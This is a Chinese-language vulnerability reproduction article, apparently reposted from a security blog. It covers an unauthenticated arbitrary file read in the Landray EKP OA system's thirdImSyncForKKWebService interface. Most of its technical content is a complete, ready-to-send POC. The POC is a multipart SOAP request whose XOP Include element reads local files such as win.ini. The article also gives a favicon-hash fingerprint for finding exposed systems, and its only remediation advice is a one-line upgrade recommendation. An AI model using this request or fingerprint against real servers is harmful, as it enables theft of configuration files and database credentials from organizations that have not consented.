2026-01-26 02:15:07 网络安全文章来源：ZONE.CI 全球网 0 阅读模式

文章总结： 蓝凌EKP系统的thirdImSyncForKKWebService接口存在任意文件读取漏洞，未经认证攻击者可利用此漏洞读取系统敏感文件如数据库配置等，导致网站处于高危状态。文档提供了资产测绘指纹及详细的POC复现代码，建议用户及时升级至安全版本以修复该风险。 综合评分： 85 文章分类： 漏洞分析,漏洞POC,渗透测试,WEB安全,漏洞预警

cover_image

蓝凌EKP系统接口thirdImSyncForKKWebService接口存在任意文件读取漏洞

原创

安服仔安服仔

北风漏洞复现文库

2026年1月24日 23:59 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

—

漏洞名称

蓝凌EKP系统接口thirdImSyncForKKWebService接口存在任意文件读取漏洞

—

影响版本

—

漏洞简介

蓝凌EKP由深圳市蓝凌软件股份有限公司自主研发，是一款全程在线数字化OA，应用于大中型企业在线化办公，包含流程管理、知识管理、会议管理、公文管理、任务管理及督办管理等100个功能模块。蓝凌EKP系统接口thirdImSyncForKKWebService接口存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

—

资产测绘

web.icon=="302464c3f6207d57240649926cfc7bd4"

—

漏洞复现

POC

POST /sys/webservice/thirdImSyncForKKWebService HTTP/1.1Host: 域名:端口Cookie:acw_tc=0bce952217351164448538504e88d6f6fe2d8bc467a2114facce59d83f7060;SESSION=OWIwMjEzMGItYWE2ZC00Nzg1LTk4ODItNTkyOWZjODBmYTdmUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentSec-Ch-Ua:"Not;A=Brand";v="99","Chromium";v="106"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: multipart/related;boundary=----oxmmdmlnvlx08yluof5qContent-Length: 609&nbsp;------oxmmdmlnvlx08yluof5q&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Content-Disposition:form-data; name="a"&nbsp;&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:web="http://webservice.kk.im.third.kmss.landray.com/">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <soapenv:Header/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <soapenv:Body>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <web:getTodo>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <arg0>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <otherCond>1</otherCond>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <pageNo>1</pageNo>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <rowSize>1</rowSize>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <targets>1</targets>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <type><xop:Includexmlns:xop="http://www.w3.org/2004/08/xop/include"href="file:///c:windows/win.ini"/></type>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </arg0>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </web:getTodo>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </soapenv:Body>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; </soapenv:Envelope>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ------oxmmdmlnvlx08yluof5q--

—

修复建议

升级到安全版本

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库安服仔安服仔《蓝凌EKP系统接口thirdImSyncForKKWebService接口存在任意文件读取漏洞》